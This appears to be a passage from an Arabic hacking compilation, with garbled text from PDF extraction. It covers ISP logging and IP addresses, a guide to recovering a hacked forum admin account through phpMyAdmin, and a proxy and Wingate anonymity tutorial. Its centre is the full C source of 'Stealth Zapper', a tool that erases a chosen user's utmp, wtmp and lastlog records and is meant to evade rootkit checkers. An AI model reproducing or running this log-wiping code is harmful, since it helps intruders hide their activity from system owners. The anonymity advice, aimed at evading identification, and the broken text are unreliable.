‬‬ ‫فیها‪ .‬‬ ‫‪.‬‬ ‫للمؤسسة التي تعمل‬ ‫على‪ ‬‬ ‫أما الخبار الطیبة لمستخدمي إنترنت‪ ،‬فهي أن معظم مزودي خدمات إنترنت ل یطلعون ى‬ ‫وهو‪ ‬‬ ‫السجلت‪ ،‬ما لم یطلب منهم ذلك بأمر رسمي من الجهات المسؤولة عن تطبیق القانون‪ ،‬و‬ ‫تتطلب‪ ‬‬ ‫ب‬ ‫أمر نادر الحدوث‪ .‬تبقى إمكانیة التطفل على أفعال المشتركین قائمة‪ ،‬لكنها‬ ‫مستعدین‪ ‬‬ ‫ن‬ ‫ت طوی ً‪ ،‬بالضافة إلى أن معظم مزودي خدمات إنترنت غیر‬ ‫جهود ً كبیرة‪ ،‬ووق ً‬ ‫اا‪ ‬‬ ‫ا‬ ‫ل‬ ‫بمراقبة‪ ‬‬ ‫ة‬ ‫للمخاطرة بسریة المشتركین‪ ،‬وخسارة بعضهم‪ .‬ول یهتمون‪ ،‬لهذا السبب‪،‬‬ ‫لتحریر‪ ‬‬ ‫ر‬ ‫المشتركین‪ ،‬بدللة أنهم یرسلون رسائل البرید الصادر‪ ،‬بأسرع ما یمكن‪،‬‬ ‫الوارد‪ ،‬‬ ‫‪،‬‬ ‫المساحات التي یشغلها على القراص الصلبة‪ .‬ویحذفون البرید اللكتروني‬ ‫الخاص‪ ..‬‬ ‫‪.‬‬ ‫بسرعة‪ ،‬بعد أن یجلبه مستخدم إنترنت إلى كمبیوتره‬ ‫خطوط‪ ‬‬ ‫ط‬ ‫قد یختلف المر بالنسبة للعاملین في المؤسسات الكبیرة‪ ،‬التي تتصل بإنترنت عبر‬ ‫خاصة مؤجرة‪ ،‬ویتوفر لدیها مزود داخلي‪ .‬فمن مصلحة مدراء هذه المؤسسات‪ ،‬فرض رقابة على‬ ‫ى‬ ‫والدردشة‪ ،‬‬ ‫‪،‬‬ ‫الموظفین‪ ،‬لمنعهم من تبدید وقت العمل في تصفح مواقع الریاضة‪ ،‬والترفیه‪،‬‬ ‫یعملون‪ ‬‬ ‫ن‬ ‫ض‪ ،‬للتأكد من أنهم ل‬ ‫على شبكة ویب‪ .‬وربما یراقبون بریدهم اللكتروني أی ً‬ ‫اا‪ ‬‬ ‫في‪ ‬‬ ‫لحساب جهة أخرى‪ ،‬أو لحسابهم الخاص‪ .‬فإذا كنت واحد ً من هؤلء الموظفین‪ ،‬فحاذر ي‬ ‫اا‪ ‬‬ ‫‪ ..‬‬ ‫كیفیة استخدامك للشبكة‪ ،‬فربما یوجد من یراقب تصرفاتك! ‪.‬‬ ‫‪ 322‬‬ ‫نمبر؟‪ ‬‬ ‫؟‬ ‫ماذا یكشف رقم البي‬ ‫الذي‪ ‬‬ ‫عندما یزور شخص موقعً على الشبكة‪ ،‬یسجل الموقع رقم البي العائد للكمبیوتر ي‬ ‫اا‪ ‬‬ ‫اتصل به‪ .‬وعند إرسال رسالة إلكترونیة‪ ،‬یمكن لمتسلم الرسالة معرفة عنوان البي ‪ ،،‬‬ ‫ینقر‪ ‬‬ ‫للكمبیوتر المرسل‪ ،‬أیض ً‪ .‬فإذا كان یستخدم برنامج مث ً الوتلوك‪ ،‬فیكفي أن ر‬ ‫اا‪ ‬‬ ‫ل‬ ‫عنوان‪ ‬‬ ‫ن‬ ‫على اوبشن بعد أن یفتح الرسالة‪ ،‬لیطلع على عنوان البي لكن‪ ،‬هل یحدد‬ ‫خاص‪ ‬‬ ‫الكمبیوتر المتصل‪ ،‬بدقة؟ إذا كان الكمبیوتر المتصل‪ ،‬ینتمي إلى شبكة مرتبطة بخط ص‬ ‫مؤجر كما هو حال العدید من شبكات المؤسسات المتوسطة والكبیرة‪ ،‬فسوف یكشف عنوان عن‬ ‫ن‬ ‫المتصل‪ .‬‬ ‫‪.‬‬ ‫اسم تلك المؤسسة‪ ،‬ورقم الكمبیوتر‬ ‫لتحدید‪ ‬‬ ‫د‬ ‫أما إذا كان الكمبیوتر یتصل عن طریق طلب رقم هاتف عادي فل یكفي رقم البي ‪،‬‬


‫الجهة المتصلة بالموقع (أو التي بعث برسالة)‪ ،‬إذا سیكشف القسمان الول والثاني من‪ ‬‬ ‫الرقم‪ ،‬بدًء من الیسار‪ ،‬عن اسم مزود خدمات إنترنت‪ ،‬الذي یشترك لدیه المتصل‪ ،‬فیما‪ ‬‬ ‫ا‪ ‬‬ ‫یحدد القسمان الثالث والرابع‪ ،‬رقم مجموعة الكمبیوترات‪ ،‬والكمبیوتر المتصل لدى مزود‪ ‬‬ ‫الخدمة‪ ،‬على التوالي‪ ،‬ولیس الكمبیوتر الذي أجرى التصال الولي‪ .‬وقد یحمل‪ ،‬لهذا‪ ‬‬ ‫السبب‪ ،‬العدید من المتصلین عن طریق مزود خدمة واحد‪ ،‬عناوین متطابقة‪ ،‬إذا جرى‪ ‬‬ ‫التصال في أوقات مختلفة‪ .‬كیف یمكن اكتشاف المتصل (أو مرسل الرسالة) في هذه الحالة‪ ،‬‬ ‫إن ارتكب مخالفة قانونیة؟‪ ‬‬ ‫یمكن ذلك عن طریق مزود خدمة إنترنت (‪ (ISP‬‬ ‫الذي تحتفظ كمبیوتراته‪ ،‬بسجلت عن كافة التصالت‪ ،‬تضم حق ً لرقم ‪ ،‬وحقلین لكل من‪ ‬‬ ‫ل‪ ‬‬ ‫تاریخ وزمن التصال وحق ً لسم المشترك‪ .‬ویكفي أن تزوده الجهة المتضررة بقیمة‪ ‬‬ ‫ل‪ ‬‬ ‫الحقول الثلثة الولى (تكون مسجلة لدیها)‪ ،‬كي یكتشف اسم المشترك‪ .‬ویمكنه بالتعاون‪ ‬‬ ‫مع مؤسسة الهاتف‪ ،‬الوصول إلى الرقم الذي تم عن طریقه التصال‪ .‬لكن هذه الجراءات‪ ‬‬ ‫تتطلب تدخ ً من قبل الجهات الرسمیة المشرفة على تطبیق القانون‪ .‬‬ ‫ل‪ ‬‬ ‫‪ 422‬‬ ‫‪StealthZapper‬لمسح تحركاتك من على السیرفر‪ ..‬‬ ‫للكاتب‪ HeLL RaiSeR:‬‬ ‫السلم علیكم‪ ..‬‬ ‫عمل ھالكود ‪ ..‬ھ و مسح و حذف اللوج من على السیرفر لشخص انت تحدده‪ ..‬‬ ‫كود‪ :‬‬ ‫]‪// Stealth Zapper 1.0 by Topo[LB‬‬ ‫‪//‬‬ ‫‪// Erases the utmp,wtmp and lastlog entries for a specific user.‬‬ ‫‪// Unlinke classic zappers, it does not leave "holes" on wtmp and utmp files.‬‬ ‫‪// Now, it won't be possible to detect that this zapper have ever been ran on the system‬‬ ‫‪// => chkrootkit and antizap should not detect anything.‬‬ ‫‪//‬‬ ‫‪// It also detects the traces left in the utmp/wtmp logs by other classic zappers.‬‬ ‫‪//‬‬ ‫‪// Tested under GNU/Linux‬‬ ‫‪//‬‬ ‫‪// Please, use it for educational purposses only.‬‬ ‫>‪#include <stdio.h‬‬ ‫>‪#include <time.h‬‬ ‫>‪#include <string.h‬‬ ‫>‪#include <utmp.h‬‬ ‫>‪#include <getopt.h‬‬ ‫>‪#include <lastlog.h‬‬ ‫>‪#include <pwd.h‬‬ ‫>‪#include <unistd.h‬‬ ‫>‪#include <sys/types.h‬‬ ‫"‪#define VERSION "1.0‬‬ ‫;‪short verbose=0‬‬ ‫;‪short erasezaps=0‬‬ ‫;‪short analyze=0‬‬ ‫{)‪void Version(char *program‬‬ ‫;)‪ printf("\n%s\n\n",VERSION‬‬


exit (1); } void Usage(char *program){ 225 printf ("Usage: %s [­u user | ­s] [­h] [­v] [­V]\n\n", program); printf(" ­u <user> Erases the log entries for this user.\n"); printf(" ­s Removes traces of previously ran zappers\n"); printf(" ­a Analyze log files searching zapper traces\n"); printf(" ­v: be verbose\n"); printf(" ­V: prints program version and exits\n"); printf(" ­h: prints this help ;)\n\n"); exit(0); } void Exiterror(char *error){ printf ("\n ERROR: %s \n\n",error); printf ("Take a look at the help using ­h\n\n"); exit(0); } void Banner(void){ printf("\nStealth Zapper 1.0 by Topo[LB]\n\n"); } void CleanUTMP(char *username, char *filename){ FILE *file; FILE *file2; long finallenght=0; //long lastposition=0; struct utmp r_uwtmp; struct utmp r_uwtmp_zero; int i=0; short entryfound=0; long timebefore; long timeafter; short haveprint=0; int deletedentries=0; int totaldeletedentries=0; char asctimebefore[256]; char asctimeafter[256]; bzero(&r_uwtmp_zero, sizeof(r_uwtmp_zero)); if(!(file=fopen(filename, "r"))){ printf(" Error opening file %s\n\n", filename); return; } 226 if (!analyze){ if(!(file2=fopen(filename, "r+"))){ printf(" Error opening file %s\n\n", filename); return; } } if (analyze){


timebefore=0; while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) { if(!bcmp(&r_uwtmp,&r_uwtmp_zero,sizeof(r_uwtmp))){ haveprint=1; totaldeletedentries++; deletedentries++; }else { if (!haveprint) timebefore=r_uwtmp.ut_time; else { timeafter=r_uwtmp.ut_time; strcpy(asctimebefore,ctime( (time_t *)&timebefore)); strcpy(asctimeafter,ctime( (time_t *)&timeafter)); printf (" [!!!] Detected %u deleted entries between %s and %s\n",deletedentries, asctimebefore, asctimeafter); fflush(stdout); deletedentries=0; haveprint=0; timebefore=r_uwtmp.ut_time; } } } if (haveprint) { strcpy(asctimebefore,ctime( (time_t *)&timebefore)); strcpy(asctimeafter,ctime( (time_t *)&timeafter)); printf (" [!!!] Detected %u deleted entries between %s and %s\n",deletedentries, asctimebefore, asctimeafter); fflush(stdout); } if (!totaldeletedentries) printf ("\n [INFO] No zapper found :)\n\n"); else printf ("\n [!!!] ZAPPER FOUND. %d entries were deleted by someone!\n\n",totaldeletedentries); } 227 if (!erasezaps && !analyze) while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) { if(!strcmp(r_uwtmp.ut_name, username)){ if (verbose) printf("Entry detected for %s on %s. Deleting it!\n",username, ctime( (time_t *) &r_uwtmp.ut_time)); totaldeletedentries++; entryfound=1; } else { if (entryfound) fwrite((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file2); else fseek(file2, sizeof(r_uwtmp), SEEK_CUR); } } if (erasezaps && !analyze) while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) { if(!bcmp(&r_uwtmp, &r_uwtmp_zero, sizeof(r_uwtmp))){ if (verbose) printf("Erased entry detected!\n");


totaldeletedentries++; entryfound=1; } else { if (entryfound) fwrite((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file2); else fseek(file2, sizeof(r_uwtmp), SEEK_CUR); } } fclose(file); if (!analyze){ finallenght=ftell(file2); fclose(file2); if (entryfound) if (truncate(filename,finallenght)){ printf("WARNING! truncate() error"); } } if (!totaldeletedentries){ if (!analyze && !erasezaps) printf (" User %s not found!\n\n",username); if (!analyze) printf (" NO zap entries detected. 0 entries cleaned\n\n"); } else{ if (!analyze && !erasezaps) printf (" %d entries cleaned for user %s!\n\n",totaldeletedentries,username); if (!analyze) printf (" %d entries cleaned\n\n",totaldeletedentries); 228 } } void CleanLastlog(char *username, char *filename) { FILE *file; struct passwd *p_passwd; struct lastlog r_lastlog; int i=0; if((file=fopen(filename,"r+"))==NULL){ printf(" Error opening file %s\n\n", filename); return; } if ((p_passwd=getpwnam(username))==NULL){ printf (" User %s not found!\n\n",username); return; } fseek(file, (long)(p_passwd­>pw_uid*sizeof(r_lastlog)),SEEK_SET); bzero((char *)&r_lastlog, sizeof(r_lastlog)); fwrite((char *)&r_lastlog, sizeof(r_lastlog),1,file); fclose(file); printf("Lastlog file cleaned for user %s!\n\n",username); } int main(int argc, char *argv[]) { char username[UT_LINESIZE]=""; int i; Banner(); if (argc<2) Usage(argv[0]);


while((i=getopt(argc, argv, "avVshu:")) != EOF) { switch(i) { case 'V': Version(argv[0]); break; case 'h': Usage(argv[0]); 229 break; case 'v': verbose=1; break; case 's': erasezaps=1; break; case 'a': analyze=1; break; case 'u': if (!optarg) Exiterror("If you use ­u you must provide a username!"); if(strlen(optarg)>UT_LINESIZE){ printf("username is too long\n"); exit(0); } strcpy(username, optarg); break; default : Exiterror("Unknown parameter"); break; } } if (!erasezaps && !analyze && username[0]==0) Exiterror("You must use either ­s or ­u <user>"); printf(" UTMP Cleaning ...\n"); fflush(stdout); CleanUTMP(username, _PATH_UTMP); printf(" WTMP Cleaning ...\n"); fflush(stdout); CleanUTMP(username, _PATH_WTMP); if (!analyze && !erasezaps){ printf(" LASTLOG Cleaning ...\n"); fflush(stdout); CleanLastlog(username, _PATH_LASTLOG); } } 230 root ..‫ لستخدامه يشترط انك تكون‬:‫ملحظة‬ :‫الستخدام بعد الكومبايل يكون كذا‬ :‫كود‬


‫]‪Usage: ./(name after compile) [­u user | ­s] [­h] [­v] [­V‬‬ ‫‪ ­u <user> Erases the log entries for this user.‬‬ ‫‪ ­s Removes traces of previously ran zappers‬‬ ‫‪ ­a Analyze log files searching zapper traces‬‬ ‫‪ ­v: be verbose‬‬ ‫‪ ­V: prints program version and exits‬‬ ‫);‪ ­h: prints this help ‬‬ ‫للمزيد من الــ‪ Log WipperS‬‬ ‫زر ھذا الرابط‪ ‬‬ ‫‪ 231‬‬ ‫شرح طريقة استرجاع المنتدى بعد اختراقه بالصور‪ ‬‬ ‫للكاتب‪ :‬ضب متلطم‪ ‬‬ ‫بسم االله الرحمن الرحیم‪ ‬‬ ‫السلم علیكم ورحمة االله وبركاته‪ ‬‬ ‫يا اخواني ھ ذا شرح لطريقة استرجاع المنتدى بعد اختراقه وايضا اذا حدثت‪ ‬‬ ‫عندك مشكله بالیوزرات تقدر تحلھا من ھ نا لن بعض الخوان اذا حدثوا النسخه‬ ‫تصیر معھم مشاكل مع اسم المشرف العام‪ ‬‬ ‫واذا كان الموضوع موجود مسبقا فزيادة الخیر خیرين‪ ‬‬ ‫بسم االله نبدا‪ ‬‬ ‫اول شي تدخل على لوحة تحكم الموقع‪ ‬‬ ‫نضغط على ايقونة قاعدة البیانات نفس الصوره اللي تحت‪ ‬‬ ‫و بعد ما تضغط على ايقونة قاعدة البیانات بیفتح لك صفحة قواعد البیانات انزل‪ ‬‬ ‫الى اخر الصفحه واضغط على ‪ phpMyAdmin‬ثم اكمل الشرح‪ ‬‬ ‫الن اتبع الصور مشروح علیھا ال بعضھا سیتم التعلیق علیھا في اسفلھا‪ ‬‬ ‫‪ 232‬‬ ‫ستخرج لك قائمه على الیسار اختر منھا‪ ‬‬ ‫بعدھ ا تفتح لك صفحه اختر من القائمه اللي فوق الموجود في الصوره اللي‪ ‬‬ ‫تحت‪ ‬‬ ‫الصوره في السفل اتبع شرحھا بالرقام‪ ‬‬ ‫الشرح‪ ::‬‬ ‫‪1‬لتحرير العضو اي الدخول لتغییر اسمه او بريده‪ ‬‬‫‪2‬حذف العضو‪ ‬‬‫‪3‬رقم العضو‪ ‬‬‫‪4‬رقم مجموعة العضو والرقم الموجود ھو رقم ‪ :: 6 ::‬اللي ھو رقم مجموعة‬‫الـ ‪ administrator‬وھذا الرقم يھ منا اذا كان اسم المشرف العام محذوف اتبع‬ ‫الشرح وتعرف الھمیه‪ ‬‬ ‫‪ 332‬‬ ‫‪5‬اسم المشرف العام طبعا اذا اخترق احد المنتدى يبي يغیر السم عشان‪ ‬‬‫كذا الرقم يھ منا بمعرفة المشرف العام مھما تغیر السم‪ ‬‬ ‫‪6‬باسورد المشرف العام مشفر‪ ‬‬‫‪7‬بريد المشرف العام‪ ‬‬‫ـــــــــــــ‪ ‬‬ ‫انت اذا لقیت اسم المشرف العام سواء عن طريق الرقم ‪ 6‬او انت تريد تعدل‪ ‬‬ ‫علیه اضغط على رقم ‪ 1‬اي تحرير السم ثم بتفتح لك صفحه واتبع الموجود في‬ ‫الصوره تحت‪ ‬‬ ‫بعد ما تحفظ التعديلت اذھب الى المنتدى وادخل اسم المشرف العام اللي‪ ‬‬ ‫اخترته واكتب اي باسورد طبعا يبي يقول لك خطاء اطلب استعادة كلمة المرور‬ ‫ثم اكتب بريدك وانتظر الرساله ثم ادخل وشف شغلك‪ ‬‬ ‫ــــــــــ‪ ‬‬ ‫‪ 432‬‬


‫تحت‪ ‬‬ ‫اما في حالة كان اسم المشرف العام محذوف اتبع الصوره ت‬ ‫ذي‪ ‬‬ ‫ثم تبي تفتح لك الصفحه ھ ي‬ ‫المرور‪ ‬‬ ‫ر‬ ‫طبعا نفس الطريقه بعد ما تحفظ التعديلت استرجع كلمة‬ ‫ــــــــــــــــــــــــــــــــــــــــ‪ ‬‬ ‫ـ‬ ‫الشرح اللي فوق ھ ذا للمواقع العاديه فیه شرح في السفل لطريقة الدخول‬ ‫ل‬ ‫لیوكس‪ ‬‬ ‫س‬ ‫الى قاعدة البیانات بموقع‬ ‫السفل‪ ‬‬ ‫ل‬ ‫بعد تسجیل الدخول للموقع اتبع الصوره في‬ ‫‪ 532‬‬ ‫بعدھ ا بتفتح لك صفحه ثانیه وايضا اختر من القائمه الموجود في الصوره‬ ‫ه‬ ‫الصوره‪ ‬‬ ‫ه‬ ‫بعدھ ا بتفتح صفحه ثانیه وايضا اتبع‬ ‫تحت‪ ‬‬ ‫بیفتح لك مربع اختر نفس اللي بالصوره ت‬ ‫‪ 632‬‬ ‫تبي‪ ‬‬ ‫بعدھ ا بأعلى المربع موجود الخیارات اللي في الصوره تحت اختر اللي ي‬ ‫وطبق نفس الشرح الموجود فوق في تعديل اسم المشرف العام او اضافة اسم‬ ‫م‬ ‫جديد‪ ‬‬ ‫د‬ ‫‪ 732‬‬ ‫؟!!‪ ‬‬ ‫كیف تبقى مجهول الهویة !‬ ‫الــ<>ــد<>ــر‪ ‬‬ ‫ر‬ ‫للكاتب‪:‬‬ ‫الول‪ ‬‬ ‫ل‬ ‫الجزء‬ ‫بتعلیمكم‪ ‬‬ ‫م‬ ‫في ھذا الموضوع سوف أقوم‬ ‫و؟‪ ‬‬ ‫ماھ ؟‬ ‫‪ Proxy ­ Sock Host ­ Wingate‬‬ ‫النت‪ (-‬‬ ‫(‬ ‫)‪-‬وكیفیة استخدامھم للزيادة من صعوبة الكشف عن ھويتك في‬ ‫التخفي‪ ‬‬ ‫ي‬ ‫مع أدوات بسیطة أيضا تساعدك في‬ ‫‪ ++++++++++++++++++++++++++++++++++‬‬ ‫‪ Introduction to Proxy Server‬‬ ‫)=الدخول إلى ‪ proxy server‬أي‪:‬خادم الوكیل=((‪ ‬‬ ‫ى‪ ‬‬ ‫) ‪proxy server‬خادم الوكیل) ھو خادم ‪ server‬لیقوم أحدا ما بتنزيله على‬ ‫التصال‪ ‬‬ ‫ل‬ ‫نظامه للتصال مع المواقع أو أي جھاز على النترنت مايفعله أول ھو‬ ‫‪ proxy server‬‬ ‫‪p‬‬ ‫بخادم الوكیل‬ ‫الشبكات‪ ‬‬ ‫ت‬ ‫لكنه غیر إجباري لكن غالبا مايستخدم في‬ ‫‪ :LAN‬‬ ‫‪:‬‬ ‫ل‬ ‫مثل‬ ‫‪ Local Area Network‬‬ ‫ك‪ ‬‬ ‫شبكة إنترنت محلیة عند اتصالك بالنترنت خلل ‪ proxy server‬جمیع اتصالتك‬ ‫تتوزع‪ ‬‬ ‫ع‬ ‫سوف تذھب إلى ھ ذا البروكسي المستخدم أول وقبل كل شيء ثم‬ ‫كمثال‪ ‬‬ ‫ل‬ ‫على الجھ زة التي تريد أن تعمل إتصال بھا‬ ‫ح‪ ‬‬ ‫إذا أردت أن تتصل بالنترنت من خلل استخدام ‪ proxy server‬وتريد أن تتصفح‬ ‫ذا‪ ‬‬ ‫وتفتح موقعا كھ ا‬ ‫‪ /http://hackergurus.tk‬‬ ‫علیك أول بالطلب من ھذا ‪ proxy server‬ثم يقوم ‪ proxy server‬بطلب الصفحة‬ ‫ة‬ ‫‪ /http://hackergurus.tk‬‬ ‫ك‪ ‬‬ ‫إلى الخادم ‪ server‬الموقع ومن ثم تحمیلھا وتخزينھا في حسابھا بعد ذلك‬ ‫ا‪ ...‬‬ ‫سوف تمدك وتعطیك الصفحة أي‪:‬تستعرضھ ‪.‬‬ ‫‪ 832‬‬ ‫ر‪ ‬‬ ‫ألیست ھذه العملیة تأخذ ‪ bit‬بسیط في وقت أطول مقارنة بالتصال المباشر‬ ‫جاري‪ ‬‬ ‫ي‬ ‫(العادي) الذي يكلفك فقط بطلب الصفحة من خادم الموقع ومن ثم‬ ‫تحمیلھا بسھولة واستعراضھاا‪ ‬‬ ‫بطيء‪ ‬‬ ‫ء‬ ‫لكن مع استعمالك للبروكسي سیرفر سوف يصبح اتصالك بالنترنت‬ ‫مقارنة مع التصال المباشر وذلك لن كل صفحة تقوم بتحمیلھا أي تستعرضھاا‪ ‬‬ ‫ح‪ ‬‬ ‫تذھب إلى خادم البروكسي أي ‪ proxey server‬وھذا يثقل عملیة التصفح‬


‫ف‪ ‬‬ ‫وھناك حالة وحدة وقد تصبح ‪ lucky‬بعض الحیان قل كیف‬ ‫وانت‪ ‬‬ ‫إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات ت‬ ‫الي‪ ‬‬ ‫استخدمت البروكسي الي استخدمه ھذا الشخص واستعرضت الصفحة ي‬ ‫لیه؟!‪ ‬‬ ‫!‬ ‫استعرضھ ا راح يصبح البروكسي سريع‬ ‫الصفحة‪ ‬‬ ‫ة‬ ‫لن الشخص الول الي قام باستخدام البروكسي وعرض الصفحات‬ ‫ت‪ ‬‬ ‫حملت إلى ‪ proxy server‬فما بالك إذا كان لديك نفس البروكسي وحبیت‬ ‫ة‪ ‬‬ ‫تسعرض نفس الصفحة سوف يكون سريع لن الصفحة ‪ download‬جاھزة‬ ‫مت‪ ..#‬‬ ‫‪.‬‬ ‫فھ‬ ‫قبل‪ ‬‬ ‫وأيضا ياأخواني الوقت مھ م مثل اذا الواحد استعرض صفحة ببروكسي من ل‬ ‫‪01‬أيام وانت استخدمت نفس البروكسي واسعرضت نفس الصفحة غیر اذاا‪ ‬‬ ‫ة‪ ‬‬ ‫عرضھا في يومین لن ‪ proxy server‬يقدم المواقع الحديثة على القديمة‬ ‫أو‪ ‬‬ ‫علشان كذا أحیانا تلحظ تأخر في البروكسیات كل ماعلیك عمل ‪ Refresh‬و‬ ‫‪ Reload‬‬ ‫‪ Why use a Proxy Server‬‬ ‫سیرفر؟=(‪ ‬‬ ‫(‬ ‫)=لماذا نستمعل البروكسي‬ ‫وانا راح اجاوب على الخوان الي يسئلوني مادام خادم البروكسي يقوم بعملیة‬ ‫ة‬ ‫؟!!!‪ ‬‬ ‫!‬ ‫إبطاء التحمیل والتقلیل من السرعة إذا مالدافع لستخدامه‬ ‫النترنت‪ ‬‬ ‫ت‬ ‫الجواب‪:‬ھ و أن مزودين خدمة‬ ‫‪ ISP‬‬ ‫‪ Internet Service Provider‬‬ ‫وتحمیل‪ ‬‬ ‫ل‬ ‫يقومون بالتحديد وبوضعك في قفص وھ و عدم السماح لستعراض‬ ‫بتقلیل‪ ‬‬ ‫ل‬ ‫الصفحات إل التي تم الموافقة علیھ ا من قبل مزود الخدمة ويقومون‬ ‫م‪ ‬‬ ‫المواقع للحفاظ على ‪ Traffic‬الخاص بھ م لتوفیر السرعة في استخدام‬ ‫م‪ ‬‬ ‫البروكسي لمشتركینھم‬ ‫أما ‪ proxy server‬سوف يجعل لك الحرية الكاملة في استعراض أي موقع مھماا‬ ‫كان وسبب آخر للبروكسي وھو للحفاظ أو للزيادة من بقائك مجھول أثناء قیامك‬ ‫ك‬ ‫على‪ ‬‬ ‫بأي عملیة من عملیات التصال يعني لو استخدمت بروكسي راح يصعب ى‬ ‫‪ 932‬‬ ‫‪ ip‬‬ ‫خادم الموقع اصطیادك وذلك لنه يأخذ ‪ ip‬الذي اتصل الموقع من خلله وھو ‪i‬‬ ‫الموقع‪ ‬‬ ‫ع‬ ‫البروكسي وھو الذي يتصل مع خادم‬ ‫عدة‪ ‬‬ ‫وأيضا تستطیع الزيادة من صعوبة محاولة السقاط بك وذلك باستخدام ة‬ ‫سرعة‪ ‬‬ ‫ة‬ ‫بروكسیات ذات منافذ مختلفة لكن أعلم أن ھذا سوف يقوم بتقلیل من‬ ‫تستخدم‪ ‬‬ ‫م‬ ‫التصال لذلك حاول ان‬ ‫‪ proxy server‬‬ ‫‪p‬‬ ‫‪proxy‬و ‪ port‬قريبین إلى منطقتك التي تعیش فیھا حتى يكون‬ ‫سرعة‪ ‬‬ ‫ة‬ ‫قريب وبذلك سوف تزداد السرعة وأحیانا تفوق سرعة البروكسي‬ ‫!!‪ ‬‬ ‫بروكسي الخاص بمزود الخدمة مارأيك(‪! ..‬‬ ‫وضع‪ ‬‬ ‫ع‬ ‫تحذير للجمیع إياكم ياأخوان أن تنخدعوا ببروكسیات مايكروسوفت مھما‬ ‫استخدم‪ ‬‬ ‫م‬ ‫لھا من إعلن كأن يقول‬ ‫‪ 08‬‬ ‫‪cach.microsoft.com‬بمنفذ ‪0‬‬ ‫الممیزات‪ ‬‬ ‫ت‬ ‫وطبعا انت ماتصدق تلقي بروكسي بھذي‬ ‫ح‪ ‬‬ ‫‪1‬سريع التصفح‬‫ع‪ ‬‬ ‫‪2‬يفتح جمیع المواقع‬‫ي‪ ‬‬ ‫‪3‬التحمیل عالي جدا وقوي‬‫؟‪ ‬‬ ‫ھل تعرف لماذا ؟‬ ‫جدا‪ ‬‬ ‫لن أكثر المستخدمین حول العالم ھذا البروكسي سیرفر وھذا خطیر ا‬ ‫في‪ ‬‬ ‫لن ھ ذا البروكسي سیرفر سوف يقوم بمعرفة جمیع تحركاتك وحفظھا ي‬ ‫‪ Logs‬‬ ‫ملفات ‪L‬‬ ‫ت‬ ‫‪ Introduction to Wingate‬‬ ‫‪ Wingate‬‬ ‫‪W‬‬ ‫)=الدخول أو الدخال إلى=(‬ ‫؟‪ ‬‬ ‫كثیرا مانسمع عنه لكن ھل نعرف معناه الحقیقي ؟‬


‫ماھو ‪ WinGate‬؟‪ ‬‬ ‫ز‪ ‬‬ ‫ھو ‪ proxy server firewall‬أي يفوق البروكسي وھو خادم بروكسي ذو حاجز‬ ‫والتي‪ ‬‬ ‫ي‬ ‫ناري يحتوي على حزمة كبیرة وضخمة من البرامج المختصة بالحماية‬ ‫تبقیك) ‪ Anonymously‬مجھول الھوية((‪ ‬‬ ‫بشركة‪ ‬‬ ‫ة‬ ‫التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت‬ ‫بالكامل‪ ‬‬ ‫ل‬ ‫كمبیوتر‬ ‫اتصال النترنت يكون مشارك بواسطة ‪ WinGate‬تقريبا لعدة أنواع تشمل‪ ::‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪ dial up modem, ISDN, xDSL, cable modem, satellite connection, or‬‬ ‫‪ even dedicated T1 circuits‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪ 042‬‬ ‫‪ wingate‬‬ ‫آخر‪ ‬‬ ‫متشابه مع البروكسي سیرفر حیث يعمل اتصالت مع كومبیوتر لسیرفر ر‬ ‫‪ Telnet‬‬ ‫‪T‬‬ ‫خلل المنفذ ‪ 32 ,‬في الحقیقة ھو اتصال‪.‬‬ ‫ل‪ ‬‬ ‫‪ the wingate‬سوف يجعل أي شخص على الشبكة دخول النترنت أو التصال‬ ‫‪ Aminstrator‬‬ ‫‪A‬‬ ‫به لمواقع أخرى ‪ .‬بصورة سیئة وفق بین ‪ wingate‬وعدم كفاءة‬ ‫ت‪ ‬‬ ‫)المدير)وھنالك العديد من ‪ wingate‬والذي تجعل الشخاص على النترنت‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫للتصال ببعضھ م ‪ ,‬بدل من تحديد المدخل للناس من) ‪ Local Network‬‬ ‫المحلیة(‪ ‬‬ ‫(‬ ‫ل‪ ‬‬ ‫وفتح الطريق لي شیئ من ‪ ipspoof‬في ‪ ICQ ­ Mirc‬إلى سوء استغلل‬ ‫الحجم‪ .‬‬ ‫‪.‬‬ ‫ة‪ ‬‬ ‫مثل ‪ wingate‬قد يطلق علیه ‪ open wingates‬وعادة تنتھي مدتھا في بضعة‬ ‫‪ DIScover‬‬ ‫‪D‬‬ ‫أيام أو شھور حتى يقوم باكتشافه) ‪ Admin‬المدير) وھذا راح يكون‬ ‫أعضاء‪ ‬‬ ‫ء‬ ‫ياأخواني يعني مكشوف أو يتلقى شكاوي من سوء استخدام أو‬ ‫غامضین!!!‪ ‬‬ ‫!‬ ‫في‪ ‬‬ ‫الفائدة الوحیدة للمديرين ھي القدرة على وضع مستخدمین متعددين ي‬ ‫الفوائد‪ ‬‬ ‫د‬ ‫نفس التصال لكن ياأخوان المشاكل تفوق‬ ‫إذا أي شخص قام بتنزيل ‪ WinGate‬خاص به علیه الحذر بشدة ومعرفة ماھو‪ ‬‬ ‫‪ WinGate‬‬ ‫‪W‬‬ ‫يفعل ويتأكد من أنه موفق بشكل آمن وھنالك أخرى متعددة أكثر‬ ‫‪ SyGate‬‬ ‫‪S‬‬ ‫أمانا مثل برامج‬ ‫تحذف‪ ‬‬ ‫في معظم الحالت ملفات) ‪ Logs‬سجلت) الخاصة بالـ ‪ WinGate Server‬ف‬ ‫عادة بعد ‪ 84‬ساعة للعمال وأيضا للـ ‪ISP's‬خاصة بالكبارأي ليوجد حاجة أوو‪ ‬‬ ‫‪ wingate‬‬ ‫‪w‬‬ ‫موارد لتدوين كل شيء يصادف خادم‬ ‫‪ How do I find Wingates‬‬ ‫؟=(‪ ‬‬ ‫(‬ ‫)=كیف يمكنني الحصول على‪WinGate‬‬ 